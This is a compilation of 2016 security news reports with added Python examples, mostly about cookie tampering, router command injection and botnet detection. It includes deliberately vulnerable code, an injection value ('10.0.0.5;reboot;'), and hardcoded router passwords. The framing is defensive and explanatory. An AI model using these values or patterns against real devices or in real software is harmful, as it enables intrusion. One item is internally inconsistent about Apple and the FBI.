The OSCE is a security and human rights watchdog, so the attack has all the hallmarks of a cyber espionage operation; unfortunately, the organization confirmed that it does not have the capability to investigate the incident.

According to the French newspaper Le Monde, Russian hackers are responsible for the attack.

“There was an attack. We found out about it at the beginning of November,” the OSCE spokeswoman Mersiha Causevic Podzic told AFP.

“The systems are safe now. We were given entirely new security systems and passwords,” she added.

The cyber attack “compromised the confidentiality” of the OSCE IT network and put “its integrity at risk”; fortunately, the organization was still able to operate.

According to an unnamed Western intelligence source quoted by Le Monde, the attack was carried out once again by the Russian APT group known as APT28 (aka Fancy Bear, Pawn Storm, Sednit or Sofacy). Security experts consider the group responsible for numerous cyber attacks against the 2016 US Presidential Election.

The OSCE spokeswoman declined to comment on the attribution of the attack. The organization wants to avoid any “speculation” that APT28 may have launched the cyber attack.

“But we don’t have the capacity to conduct such an investigation and we don’t want to speculate,” she said.

The OSCE said “the way in which the attacker accessed the OSCE was identified, as have some of the external communication destinations”.

France’s ambassador to the OSCE tried to downplay the danger for the organization, explaining that officials in Vienna are trained to avoid falling victim to cyber attacks.

“Diplomats at the OSCE are warned that attempted spying, in whatever form, are part and parcel of this organisation,” Veronique Roger-Lacan told AFP.

The OSCE is composed of 57 members from North America, Europe, and Asia, including Russia and Ukraine.

“The OSCE works for stability, peace and democracy for more than a billion people, through political dialogue about shared values and through practical work that aims to make a lasting difference.” reads the mission of the organization. “With its Institutions, expert units and network of field operations, the OSCE addresses issues that have an impact on our common security, including arms control, terrorism, good governance, energy security, human trafficking, democratization, media freedom and national minorities.”

The organization is known for its role as an election observer and for its role in Ukraine. The OSCE was tasked with monitoring the ceasefire agreement meant to end the fighting between Ukrainian forces and Russian-backed separatists, and it currently employs 700 monitors focused on the conflict in eastern Ukraine.

Researcher found a severe flaw in the MONyog monitoring tool
30.12.2016 securityaffairs

A security expert discovered a vulnerability in the MONyog tool that could be exploited by a normal user to elevate his privileges.
The security researcher and penetration tester Mutail Mohamed (@muleyl) discovered a vulnerability in MONyog, a MySQL server monitoring tool that its vendor markets as the most secure and scalable of its kind.

The product page is https://www.webyog.com/product/monyog and the affected version is MONyog Ultimate 6.63.

The flaw resides in the session management of the MONyog application; a normal user could exploit it to elevate his privileges by altering the session.

MONyog flaw

The exploitation of the flaw is very simple: the user just has to change the parameters in the cookie stored for that session.

The value associated with a normal user is 0; an attacker can change it to 1 to gain admin privileges.

The researcher demonstrated that it is possible to elevate privileges by manipulating the value of the following cookie parameters:
The hack allows the user to create roles, view the passwords stored in the setup, and change other settings via the admin section.

Below is a video PoC of the exploitation of the flaw.

I reached out to the researcher for a comment:
“Since this is a commercial application and organizations pay for it, they at least need something secure and worth that price,” explained Mutail.
“The organization could be hugely impacted by this, because if, let’s say, a normal user goes rogue, he could get admin-level access to the organization’s network, since this application does use LDAP authentication.”
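The bug class behind this flaw is easy to show in code. Below is an added example, not MONyog’s code and not the researcher’s PoC: a session check that trusts a role flag carried in the cookie (the pattern described above, where flipping 0 to 1 grants admin), beside two fixes, a server-side session store where the client only holds an unguessable session id, and an HMAC-signed cookie for the case where the role really has to travel with the client. The cookie names `role` and `sid`, the secret, the user records and the `tamper` helper that plays the attacker’s browser are constructed assumptions; the real cookie parameters are not named here.

```python
"""Added example: client-trusted role flag (the bug) versus server-side session
state and an HMAC-signed cookie. All names and data are constructed."""
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

# constructed user directory: username -> role flag (0 = normal user, 1 = admin)
USERS = {"alice": 0, "bob": 1}


def parse_cookie(header: str) -> dict:
    """Turn a raw Cookie: header value into a {name: value} dict."""
    jar = SimpleCookie()
    jar.load(header)
    return {k: v.value for k, v in jar.items()}


def tamper(cookie_header: str, name: str, new_value: str) -> str:
    """What the attacker does in the browser: rewrite one cookie value."""
    c = parse_cookie(cookie_header)
    c[name] = new_value
    return "; ".join(f"{k}={v}" for k, v in c.items())


# --- vulnerable: the role lives in the cookie, so the client decides ------------
def is_admin_vulnerable(cookie_header: str) -> bool:
    """Whatever the client sends is believed; 'role=0' -> 'role=1' is the exploit."""
    return parse_cookie(cookie_header).get("role") == "1"


# --- fix 1: opaque session id, role looked up on the server ---------------------
SESSIONS: dict = {}          # sid -> username, server memory only


def login(username: str) -> str:
    """Issue an unguessable session id; the role never leaves the server."""
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = username
    return f"sid={sid}"


def is_admin_server_side(cookie_header: str) -> bool:
    user = SESSIONS.get(parse_cookie(cookie_header).get("sid", ""))
    return user is not None and USERS.get(user) == 1


# --- fix 2: if the role must ride in the cookie, sign it ------------------------
SECRET = secrets.token_bytes(32)   # per-deployment key, generated here for the demo


def signed_role_cookie(username: str) -> str:
    body = f"{username}:{USERS[username]}"
    mac = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return f"role={body}|{mac}"


def is_admin_signed(cookie_header: str) -> bool:
    """Recompute the MAC over the claimed body; any edit to the role flag breaks it."""
    value = parse_cookie(cookie_header).get("role", "")
    body, _, mac = value.rpartition("|")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not (body and hmac.compare_digest(mac, expected)):
        return False                      # tampered or missing: never admin
    return body.endswith(":1")


if __name__ == "__main__":
    print("vulnerable, forged:", is_admin_vulnerable(tamper("role=0", "role", "1")))
    print("server-side, forged:", is_admin_server_side(tamper(login("alice"), "sid", "1")))
    forged = tamper(signed_role_cookie("alice"), "role", "alice:1|0")
    print("signed, forged:", is_admin_signed(forged))
```

The first fix is the one to prefer: a role that never leaves the server cannot be edited by the client, and an admin demotion takes effect immediately. The signed variant only proves the cookie was issued by the server, so a role change is not visible until the cookie is reissued, and the key must be rotated if it ever leaks.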

3 Critical Zero-Day Flaws Found in PHP 7 — One Remains Unpatched!
29.12.2016 thehackernews
Three critical zero-day vulnerabilities have been discovered in PHP 7 that could allow an attacker to take complete control of websites running the latest version of the popular web programming language, which powers about 80 percent of websites.
The critical vulnerabilities reside in the unserialize mechanism of PHP 7, the same mechanism that was found to be vulnerable in PHP 5 as well, allowing hackers to compromise Drupal, Joomla, Magento, vBulletin and PornHub websites and other web servers in past years by sending maliciously crafted data in client cookies.
Security researchers at Check Point's exploit research team spent several months examining the unserialize mechanism in PHP 7 and discovered "three fresh and previously unknown vulnerabilities" in it.
While researchers discovered flaws in the same mechanism, the vulnerabilities in PHP 7 are different from what was found in PHP 5.
Tracked as CVE-2016-7479, CVE-2016-7480, and CVE-2016-7478, the zero-day flaws can be exploited in a similar manner as a separate vulnerability (CVE-2015-6832) detailed in Check Point's August report.
CVE-2016-7479—Use-After-Free Code Execution
CVE-2016-7480—Use of Uninitialized Value Code Execution
CVE-2016-7478—Remote Denial of Service
The first two vulnerabilities, if exploited, would allow a hacker to take full control of the target server, enabling the attacker to do anything from spreading malware to stealing customer data or defacing the site.
The third vulnerability could be exploited to mount a Denial of Service (DoS) attack, allowing a hacker to hang the website, exhaust its memory and eventually shut down the target system, researchers explain in their report [PDF].
According to Yannay Livneh of Check Point's exploit research team, none of the above vulnerabilities have been seen exploited in the wild.
The Check Point researchers reported the three zero-day vulnerabilities to the PHP security team on August 6 and September 15.
Patches for two of the three flaws were issued by the PHP security team on October 13 and December 1, but one of them remains unpatched.
Besides the patches, Check Point also released IPS signatures for the three vulnerabilities on October 18 and 31 to protect its customers against attacks exploiting these flaws.
To ensure their web server's security, users are strongly recommended to upgrade to the latest version of PHP.

New Android Malware Hijacks Router DNS from Smartphone
29.12.2016 thehackernews Android
Another day, another creepy malware for Android users!
Security researchers have uncovered a new Android malware targeting your devices, but this time, instead of attacking the device directly, the malware takes control of the Wi-Fi router the device is connected to and then hijacks the web traffic passing through it.
Dubbed "Switcher," the new Android malware, discovered by researchers at Kaspersky Lab, hacks the wireless routers and changes their DNS settings to redirect traffic to malicious websites.
Over a week ago, Proofpoint researchers discovered a similar attack targeting PCs: rather than infecting the target machine, a malvertising-delivered exploit kit takes control of the local Wi-Fi router the device is connected to.
Switcher Malware carries out Brute-Force attack against Routers
Hackers are currently distributing the Switcher trojan disguised as an Android app for the Chinese search engine Baidu (com.baidu.com) and as a Chinese app for sharing public and private Wi-Fi network details (com.snda.wifilocating).
Once the victim installs one of these malicious apps, the Switcher malware attempts to log in to the Wi-Fi router the victim's Android device is connected to by brute-forcing the router's admin web interface with a predefined dictionary of usernames and passwords.
"With the help of JavaScript [Switcher] tries to login using different combinations of logins and passwords," mobile security expert Nikita Buchka of Kaspersky Lab says in a blog post published today.
"Judging by the hard coded names of input fields and the structures of the HTML documents that the trojan tries to access, the JavaScript code used will work only on web interfaces of TP-LINK Wi-Fi routers."
Switcher Malware Infects Routers via DNS Hijacking

Once it has access to the web administration interface, the Switcher trojan replaces the router's primary and secondary DNS servers with the IP addresses of malicious DNS servers controlled by the attackers.
Researchers said Switcher used three different IP addresses as the primary DNS record: one is the default, while the other two are set for specific internet service providers.
Because the router's DNS settings have been changed, the attackers' DNS servers can redirect traffic to malicious websites hosted on their own servers instead of the legitimate site the victim is trying to access.
"The Trojan targets the entire network, exposing all its users, whether individuals or businesses, to a wide range of attacks – from phishing to secondary infection," the post reads.
"A successful attack can be hard to detect and even harder to shift: the new settings can survive a router reboot, and even if the rogue DNS is disabled, the secondary DNS server is on hand to carry on."
Researchers were able to access the attackers' command and control servers and found that the Switcher trojan has compromised almost 1,300 routers, mainly in China, hijacking traffic within those networks.
The Bottom Line
Android users should download applications only from the official Google Play Store.
While downloading apps from third parties does not always end in a malware infection, it certainly increases the risk, so sticking to the official store is the best way to keep malware from compromising your device and the networks it accesses.
You can also go to Settings → Security and make sure "Unknown sources" option is turned off.
Moreover, Android users should change their router's default login and password so that malware like Switcher or Mirai cannot compromise the router with a brute-force attack.

InterContinental Hotels investigating a possible card breach
29.12.2016 securityaffairs Crime

The company InterContinental Hotels Group (IHG) confirmed an ongoing investigation into an alleged card breach at some of its properties.
The well-known investigative journalist Brian Krebs was informed of a possible security breach at the hotel company InterContinental Hotels Group (IHG). Krebs received the news of the alleged card breach from his sources in the financial industry, who had observed a pattern of fraudulent activity on credit and debit cards used at some IHG properties.

“Those sources said they were seeing a pattern of fraud on customer credit and debit cards that suggested a breach at some IHG properties — particularly Holiday Inn and Holiday Inn Express locations.” wrote Krebs.

“Asked about the fraud patterns reported by my sources, a spokesperson for IHG said the company had received similar reports, and that it has hired an outside security firm to help investigate.”

InterContinental Hotels

IHG has more than 5,000 hotels across the world; the group includes many brands such as InterContinental, Holiday Inn, Crowne Plaza, Kimpton, Hualuxe, Indigo, and Even.

Representatives of the Group confirmed they were aware of the fraud patterns and promptly started an investigation with the support of a security firm.

Below is the statement issued by IHG:

“IHG takes the protection of payment card data very seriously. We were made aware of a report of unauthorized charges occurring on some payment cards that were recently used at a small number of U.S.-based hotel locations. We immediately launched an investigation, which includes retaining a leading computer security firm to provide us with additional support. We continue to work with the payment card networks.”

“We are committed to swiftly resolving this matter. In the meantime, and in line with best practice, we recommend that individuals closely monitor their payment card account statements. If there are unauthorized charges, individuals should immediately notify their bank. Payment card network rules generally state that cardholders are not responsible for such charges.”

While the investigation is ongoing, customers should closely monitor their payment card statements and report any suspicious transaction.

InterContinental hotels suffered other breaches in the past: payment systems at Kimpton Hotels & Restaurants were compromised by PoS malware discovered this summer.

InterContinental hotels were also involved in a breach suffered earlier this year by HEI Hotels & Resorts.

The hospitality sector is a privileged target for hackers; according to experts from Trustwave, even the notorious Carbanak cybercrime gang changed strategy to target organizations in the sector.

This year major companies operating in the industry admitted suffering a data breach, including Hard Rock Hotel & Casino Las Vegas, Trump Hotels, and Millennium Hotels & Resorts.

ZyXEL customized routers plagued by multiple vulnerabilities
29.12.2016 securityaffairs

According to the firm SecuriTeam, several ZyXEL customized routers are affected by multiple vulnerabilities that could be easily exploited by hackers.
According to SecuriTeam, multiple ZyXEL customized routers are affected by a number of vulnerabilities. The devices are distributed by the Thai ISP TrueOnline, which offers them to customers for free with default settings, including default accounts and passwords, a gift for hackers.

Three models are widespread: the ZyXEL P660HN-T v1, the ZyXEL P660HN-T v2, and the Billion 5200W-T; the first was distributed up to 2013.

“Several models are distributed by TrueOnline, three in particular are widespread:

ZyXEL P660HN-T v1 (distributed up to 2013)
ZyXEL P660HN-T v2
Billion 5200W-T (currently being distributed to new clients)
These are customized versions of existing ZyXEL and Billion routers. They are MIPS systems and they all run BOA web server.” reads the security advisory published by SecuriTeam.

ZyXEL customized routers

The vulnerabilities were discovered by an independent security researcher. They include an unauthenticated remote command execution flaw in the P660HN-T v1, both unauthenticated and authenticated remote command execution flaws in the Billion 5200W-T, and an authenticated remote command execution flaw in the P660HN-T v2 that is effectively unauthenticated because of a hardcoded supervisor password.

The P660HN-T v1 device is affected by a command injection vulnerability in Maintenance > Logs > System Log > Remote System Log; the issue resides in the remote_host parameter of the ViewLog.asp page, which is accessible to an unauthenticated attacker.

The network device comes with the following default credentials:

username: admin; password: password
username: true; password: true
An unauthenticated command injection is present in the adv_remotelog.asp file of the Billion 5200W-T router. An attacker can trigger the vulnerability via the syslogServerAddr parameter by entering a valid IP address followed by “;<COMMAND>;”.

The same device is affected by an authenticated command injection in the tools_time.asp interface via the uiViewSNTPServer parameter. Also in this case, the expert discovered that the device includes the following default accounts:

username: admin; password: password
username: true; password: true
username: user3; password: 12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678
The third device, the P660HN-T v2 router, is affected by a remote command injection vulnerability that results from an authenticated command injection chained with a hardcoded supervisor password. The flaw resides in the logSet.asp file, while the hardcoded supervisor credentials are username: supervisor; password: zyad1234.

“The actual command that can be injected has a length limitation of 28 characters,” states the advisory, which also lists the default accounts of the P660HN-T v2 router:

username: admin; password: password
username: true; password: true
username: supervisor; password: zyad1234
The sad aspect of the story is that the researcher reported the vulnerabilities to ZyXEL in July, but the company still hasn’t issued any patch or workaround.

Vulnerabilities in IoT devices, including home routers and SOHO devices, are particularly critical, because attackers can exploit them to compromise the equipment and recruit it into powerful “thingbots” such as the Mirai botnet.
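The remote-syslog injection described above, as an added example in Python that is neither the router firmware nor SecuriTeam’s PoC: a handler that splices the syslog server parameter straight into a shell command line, so that a value of the form `1.2.3.4;<COMMAND>;` runs `<COMMAND>`, beside a handler that accepts only an IP literal or a hostname and builds an argv list that never goes through a shell. The handler names, the `syslogd -R` command line and the sample requests are assumptions; nothing is executed, both handlers only return what they would run. The `is_injection_attempt` check is the same validator turned into a detection signal for a web-server log.

```python
"""Added example: how a remote-syslog setting becomes OS command injection, and
how to accept the same setting safely. Names, command lines and requests are
constructed; nothing is executed, both handlers return what they would run."""
import ipaddress
import re
from urllib.parse import unquote

# RFC 1123 host name: labels of letters, digits and hyphens, no leading/trailing
# hyphen, at most 253 characters. No shell metacharacter can ever match this.
_HOSTNAME = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)


def _param(query: str, name: str) -> str:
    """Minimal query-string lookup; '&' separates pairs, ';' is ordinary data."""
    for pair in query.split("&"):
        k, _, v = pair.partition("=")
        if k == name:
            return unquote(v)
    return ""


def set_remote_syslog_vulnerable(query: str) -> str:
    """The bug: the parameter is pasted into a shell command line, so
    '10.0.0.5;reboot;' runs 'reboot' as the web server user (root on these boxes)."""
    addr = _param(query, "syslogServerAddr")
    return f"syslogd -R {addr}"        # would be handed to system() / sh -c


def validate_syslog_target(value: str) -> str:
    """Accept only an IP literal or a host name; reject everything else loudly."""
    try:
        return str(ipaddress.ip_address(value))   # normalises, raises on junk
    except ValueError:
        pass
    if _HOSTNAME.match(value):
        return value
    raise ValueError(f"invalid syslog server: {value!r}")


def set_remote_syslog_hardened(query: str) -> list:
    """Validate first, then build an argv list: no shell, no word splitting,
    no metacharacters. The 28-character limit on the injected command that the
    advisory mentions is irrelevant here because nothing is interpreted."""
    addr = validate_syslog_target(_param(query, "syslogServerAddr"))
    return ["syslogd", "-R", addr]     # would be handed to execve() / subprocess.run(argv)


def is_injection_attempt(value: str) -> bool:
    """Detection-side view: a value that fails validation is logged as an attack."""
    try:
        validate_syslog_target(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    attack = "syslogServerAddr=10.0.0.5;reboot;"
    print(set_remote_syslog_vulnerable(attack))
    print(set_remote_syslog_hardened("syslogServerAddr=10.0.0.5"))
    print(is_injection_attempt("10.0.0.5;reboot;"))
```

Validation alone is not the fix; the argv form is. A firmware that validates but still calls `system()` remains one regex bug away from the same RCE, whereas an `execve()` with a fixed argv has no shell to abuse even when the validator is wrong. The default credentials listed above still need to go, since the authenticated variants on these routers are only as strong as `admin:password`.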

The Leet Botnet powered a 650 Gbps DDoS attack before Christmas
29.12.2016 securityaffairs

Just before Christmas, a massive DDoS attack powered by a new botnet dubbed Leet Botnet hit the network of the firm Imperva.
Security experts from Imperva observed a massive attack against the company network on the morning of December 21. The DDoS attack reached 650 Gbps; according to the researchers it was powered by the Leet botnet and targeted several anycasted IPs on the Imperva Incapsula network.

Leet Botnet

The attack was launched once again by thousands of compromised IoT devices.

The attack didn’t target a specific customer of the company, likely because the attackers were not able to resolve the IP address of the victim, which was hidden behind the Incapsula mitigation proxies.

“It’s hard to say why this attack didn’t focus on a specific customer. Most likely, it was the result of the offender not being able to resolve the IP address of his actual victim, which was masked by Incapsula proxies.” reads the analysis published by Imperva.

Experts observed two distinct DDoS bursts: the first lasted 20 minutes and peaked at 400 Gbps, while the second lasted around 17 minutes and reached 650 Gbps.

“The first DDoS burst lasted roughly 20 minutes, peaking at 400 Gbps. Failing to make a dent, the offender regrouped and came back for a second round. This time with enough botnet “muscle” to generate a 650 Gbps DDoS flood of more than 150 million packets per second (Mpps).” continues the analysis.

Both attacks failed. The experts were not able to trace the real source of the attacks because the attackers used spoofed IPs.

The analysis of the content of the packets composing the malicious traffic revealed that the attack was powered by the Leet botnet, so called because of a ‘signature’ within the packets.

“The first thing we noticed was that the offender left a “signature” of sorts in some of the regular-sized SYN packets. In the TCP Options header of these packets, the values were arranged so they would spell “1337”. To the uninitiated, this is leetspeak for “leet”, or “elite”.” states Imperva.

Experts also noticed that the large SYN payloads (799 to 936 bytes) were populated with seemingly random strings of characters, while others contained shredded lists of IP addresses.

“It seems that the malware we faced was programmed to access local files (e.g., access logs and iptable lists) and scramble their content to generate its payloads.”

Mirai is not alone: the threat landscape has a new actor, the Leet botnet, which can be equally dangerous.
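The two packet traits Imperva describes, a SYN that carries a large payload and TCP options arranged to spell “1337”, are cheap to check at the edge. The following is an added example in Python, not Imperva’s code: a parser for IPv4/TCP headers, a classifier that returns which Leet traits a segment shows, and a per-source tally of the kind a blocklist feed needs. The sample packets are constructed with a small builder, and treating “spell 1337” as the ASCII bytes 31 33 33 37 appearing inside the option field is an assumption about packets the editor has not seen.

```python
"""Added example: flag Leet-style segments (SYN with data, "1337" in TCP options)
over constructed IPv4/TCP packets. Checksums are left zero; parsing does not need them."""
import struct

LEET_MARK = b"1337"


def build_ipv4_tcp(src, dst, sport, dport, flags, options=b"", payload=b""):
    """Constructed IPv4+TCP segment, enough for header parsing (no checksums)."""
    opts = options + b"\x00" * (-len(options) % 4)         # pad options to 32-bit words
    data_off = 5 + len(opts) // 4                          # header length in 32-bit words
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 0, 0, data_off << 4, flags,
                      65535, 0, 0) + opts + payload
    total = 20 + len(tcp)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total, 0, 0x4000, 64, 6, 0,
                     bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return ip + tcp


def parse_ipv4_tcp(pkt: bytes) -> dict:
    """Pull out what the detection needs: addresses, flags, options, payload length."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6:
        raise ValueError("not TCP")
    tcp = pkt[ihl:]
    sport, dport, _, _, off_byte, flags = struct.unpack("!HHIIBB", tcp[:14])
    data_off = (off_byte >> 4) * 4
    return {
        "src": ".".join(map(str, pkt[12:16])),
        "sport": sport, "dport": dport,
        "syn": bool(flags & 0x02), "ack": bool(flags & 0x10),
        "options": tcp[20:data_off],
        "payload_len": len(tcp[data_off:]),
    }


def leet_indicators(pkt: bytes) -> list:
    """Names of the Leet traits present in one segment (empty list = nothing odd)."""
    seg = parse_ipv4_tcp(pkt)
    hits = []
    if seg["syn"] and not seg["ack"] and seg["payload_len"] > 0:
        hits.append("syn_with_payload")      # a plain SYN should carry no data
    if LEET_MARK in seg["options"]:
        hits.append("1337_in_options")
    return hits


def leet_sources(pkts) -> dict:
    """Per-source count of flagged segments. Sources are spoofed in this attack, so
    the tally is for rate-limiting and forensics, not for attribution."""
    tally = {}
    for p in pkts:
        if leet_indicators(p):
            src = parse_ipv4_tcp(p)["src"]
            tally[src] = tally.get(src, 0) + 1
    return tally


if __name__ == "__main__":
    mss = b"\x02\x04\x05\xb4"                                   # MSS=1460, a normal option
    normal = build_ipv4_tcp("192.0.2.10", "198.51.100.1", 40000, 80, 0x02, options=mss)
    leet = build_ipv4_tcp("203.0.113.7", "198.51.100.1", 40001, 80, 0x02,
                          options=mss + LEET_MARK, payload=b"A" * 800)
    print(leet_indicators(normal), leet_indicators(leet), leet_sources([normal, leet, leet]))
```

The `syn_with_payload` trait is the more durable of the two: the “1337” marker is a vanity signature the operator can drop tomorrow, while an 800-byte SYN is inherent to this flood’s design, and outside TCP Fast Open a SYN with data has no legitimate reason to reach a web front end.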

Dreaded KillDisk Malware now includes Ransomware abilities
29.12.2016 securityaffairs

Researchers at security firm CyberX have recently discovered a variant of the KillDisk malware that also implements ransomware features.
KillDisk is malware that has been used in attacks against industrial control systems (ICS); it was developed to wipe the hard drives of infected machines in order to make them inoperable.

The new variant encrypts files with the AES algorithm, using a unique key for each target, and encrypts that key with RSA 1028 using a key stored in the body of the malware.

The variant is able to encrypt a large number of files; both local partitions and network folders are targeted.

Victims are asked to pay 222 bitcoins ($206,000) to recover their files, an exorbitant figure that suggests the author intends to attack organizations with deep pockets.

The experts believe the variant was developed by the TeleBots group, a Russian cybercriminal gang that built its TeleBots malware starting from BlackEnergy. The group was recently observed by experts from ESET targeting Ukrainian banks.

“This new variant of KillDisk was developed by the TeleBots gang, a group of Russian cybercriminals believed to have evolved from the Sandworm gang. The Sandworm gang is responsible for a string of attacks in the United States during 2014 that compromised industrial control system (ICS) and SCADA networks using a variant of the BlackEnergy malware” states the report published by the CyberX.

The researchers speculate that the malware is being distributed via malicious Office attachments. A close look at the contact email used in the ransom instructions reveals that the hackers used the Tor-based anonymous email service lelantos.org.

The Bitcoin Wallet used by the hackers is still empty and there is no indication of past transactions.

KillDisk Malware

CyberX noticed that the same RSA public key is used in all the samples it analyzed, which implies that the corresponding private key could be used to decrypt files for all victims.

According to CyberX, the KillDisk malware first elevates its privileges and then registers itself as a service. The malicious code kills various processes, excluding critical system processes and those associated with anti-malware applications, so as to avoid triggering detection.

Kaspersky discovered a One-stop-shop for hacking goods
29.12.2016 securityaffairs

Security experts from Kaspersky Lab discovered an interesting one-stop-shop for purchasing hacking goods while investigating the activity of a popular RAT.
The malware researchers were analyzing traffic from a number of infected machines that appeared to be generated by the HawkEye RAT.

HawkEye is a popular RAT that can be used as a keylogger; it is also able to identify login events and record the destination, username, and password.

The domain contacted by the infected machines was used as a C&C server for the HawkEye RAT and, at the same time, as a one-stop-shop for purchasing hacking goods.


Kaspersky also came across a group of self-described white-hat hackers who call themselves Group Demóstenes, who scan the Internet looking for command and control servers from which to exfiltrate stolen data.

When the hackers find a server containing stolen data, they look for a backdoor that would give them access to the filesystem. In this way they monitor incoming stolen data, collect the stolen credentials and send emails to the victims’ accounts, either manually or automatically.

The email sent to the victims includes an attachment as proof that their machine has been hacked, a suggestion to change their passwords, and an offer of help.

Hi ***********
Our SERVERS detected information from a server on the US, we don’t even know goverment or another sourse …. we send a file with all your logins and passwords of all your accounts from hxxp://www.p******op[.]biz/*******
Seme you verify this information. it’s better thing we hurt all change password on the other computer Because Called Computer

Local Time: 03.10.2016. 18:45:02
Installed Language: en-
Net Version: 2.0.50727.5485
Operating System Platform: Win32NT
Operating System Version: 6.1.7601.65536
Operating System: Microsoft Windows 7 Home Premium
Internal IP Address:
External IP Address:
Installed Anti virus: Avast Antivirus
Installed Firewall:

have a keylogger harm report All That You write, messages, passwords or more.

¿Why we do it?
We have a Cause Called Group Demóstenes looking for Ciber attacks and false info.
Please Donate by PayPal at h**cg**an@gmail[.]com 5 USD or more, Because this is only our ingress.


Back to the one-stop-shop discovered by Kaspersky, the experts discovered it is composed of a back-end for storing stolen credentials and a front-end for selling some of them, alongside many other hacking “goods”.

“To purchase goods in the private shop you must deposit money into your account on the website. The attackers accept Bitcoins, PerfectMoney and WebMoney.” states the analysis published by Kaspersky.

The shop allows users to register an account in order to make purchases. Kaspersky discovered the C&C was affected by a crucial vulnerability which allowed researchers to download the stolen data.


Among the items offered for sale, there are scam pages specifically designed to target Amazon, Apple, Netflix and even National Bank of Australia and Barclays.

The shop also provides information on the support available to buyers of its scam services.

The researchers discovered stolen credentials for sensitive applications across multiple industries, including government, healthcare, banking and payment web applications.

“Among them is the following web server which belongs to the Pakistani government.” states the report. “As mentioned, hundreds of machines were found to be compromised by just one C2.”

Researchers from Kaspersky obtained the attackers’ credentials from one very small file that was discovered on the server.

Analysis of the affected users revealed that they are mostly located in APAC (e.g. Japan, Thailand and India) and Eastern Europe (e.g. Russia and Ukraine).

Police Ask for Amazon Echo Data to Help Solve a Murder Case
28.12.2016 thehackernews Security

Hey, Alexa! Who did this murder?
Arkansas police are seeking help from e-commerce giant Amazon for data that may have been recorded on its Echo device belonging to a suspect in a murder case, bringing the conflict into the realm of the Internet of Things.
Amazon Echo is a voice-activated smart home speaker capable of controlling several smart devices by integrating it with a variety of home automation hubs. It can do tasks like play music, make to-do lists, set alarms, and also provide real-time information such as weather and traffic.

As first reported by The Information, authorities in Bentonville have issued a warrant for Amazon to hand over audio or records from an Echo device belonging to James Andrew Bates in the hope that they'll aid in uncovering additional details about the murder of Victor Collins.
Just as Apple refused to help the FBI unlock the iPhone belonging to one of the San Bernardino terrorists, Amazon has also declined to give police any of the information that the Echo logged on its servers.
Collins died on November 21 last year while visiting the house of Bates, his friend from work, in Bentonville, Arkansas. The next morning, Collins' dead body was discovered in a hot tub, and Bates was charged with first-degree murder.
As part of the investigation, authorities seized an Amazon Echo device belonging to Bates, among other internet-connected devices in his home, including a water meter, a Nest thermostat, and a Honeywell alarm system.
Always-ON Listening Feature
Echo typically sits in an idle state with its microphones constantly listening for the "wake" command like "Alexa" or "Amazon" before it begins recording and sending data to Amazon's servers.

However, because of its always-on design, it is not unusual for the Echo to activate by mistake and grab snippets of audio that users may not have known were being recorded.
Some of those voice commands are not stored locally on Echo but are instead logged onto Amazon's servers.
Presumably, the authorities believe that audio the Echo device might have picked up on the night of the incident and uploaded to Amazon's servers could contain evidence related to the case under investigation.
Amazon Refused (Twice) to Hand over its User's Data
Amazon, however, declined to provide the data the authorities requested. Here's what a spokesperson for the company told CNBC:
"Amazon will not release customer information without a valid and binding legal demand properly served on us. Amazon objects to overbroad or otherwise inappropriate demands as a matter of course."
While the online retail giant has twice refused to hand over to police the Echo data logged on its servers, Amazon did provide Bates' account information and purchase history.
The police said they were able to extract data from Echo, though it's uncertain what they were able to uncover and how useful that data would be in their investigation.
According to court records, Bates' smart water meter shows that his home ran 140 gallons of water between 1 AM and 3 AM the night Collins was found dead in Bates' hot tub. The prosecution claims that the water was used to wash away evidence after he killed Collins.
Should Amazon Share the Data or Not?
The authorities in the Collins murder case are asking for data on Amazon's servers that could help bring a criminal to justice. If so, authorities should get access to it.
In the case of Apple vs. FBI, Apple was forced to write backdoor software that could bypass the security mechanism built into its iPhone, even though the company had already handed over the data stored on its servers.
The broader takeaway: IoT devices automating your habits at home could be used for or against you, legally.
The Collins murder case appears to be the first of its kind, and we are sure to see more such cases in the future.
It will be interesting to see how the companies that make smart home devices serve their customers while striking a balance between protecting their customers' privacy and aiding the process of justice.

Did You Install Super Mario Run APK for Android? That's Malware
28.12.2016 thehackernews Android

After the success of Pokémon Go, Nintendo's "Super Mario Run" has become the hottest game to hit the market with enormous popularity and massive social impact. The game has taken the world by storm since its launch for iOS devices over a week ago.
Can you believe — it was downloaded more than 40 million times worldwide in its first four days of release.
But if you have downloaded a Super Mario Run APK for your Android device, beware! That's definitely malware.
Since Super Mario Run has currently been released only for iOS devices and is not on Google Play, it caused a lot of disappointment among Android users.

So, eventually, many Android device owners who love Mario games and cannot wait to play Super Mario Run ended up downloading APKs from outside the Google Play Store.
But many of the phony, copycat Super Mario apps on third-party Android app stores turn out to be malware that attempts to look like the legitimate Super Mario Run app.
Super Mario can Take Full Control of your Android Device
To install a third-party APK, users have to "side-load" the malicious app by changing their Android security settings to allow the operating system to install apps from "untrusted sources."
Some of these malicious apps can even take full control of your Android device, as the apps request privileges to edit, read, receive and send text messages, take photos and record videos and track your location using GPS.
One of the apps, titled "Super Mario", creates additional icons, displays pop-up and banner ads, installs other malicious apps onto the victim's smartphone, and performs other intrusive activities without any user interaction, according to the Tokyo-based antivirus firm Trend Micro, which detected malicious Super Mario apps 90,000 times this year.
"Clicking on these ads or icons will direct users to either adult sites or malicious sites. In either case, the goal is to get users to install various apps," researchers at Trend Micro write.

"While some of these apps are perfectly legitimate, some are suspicious apps distributed by third-party app stores, including more malicious apps that even request for administrator rights."
Another app, also titled "Super Mario" and discovered by the security firm, first prompts users to install an app called 9Apps, which then asks for more permissions, including recording audio, reading and modifying the calendar, and even full access to the SD card.
Here's How to Protect Yourself
So, instead of downloading applications from unknown third-party stores, Android users should wait for the official Google Play release.
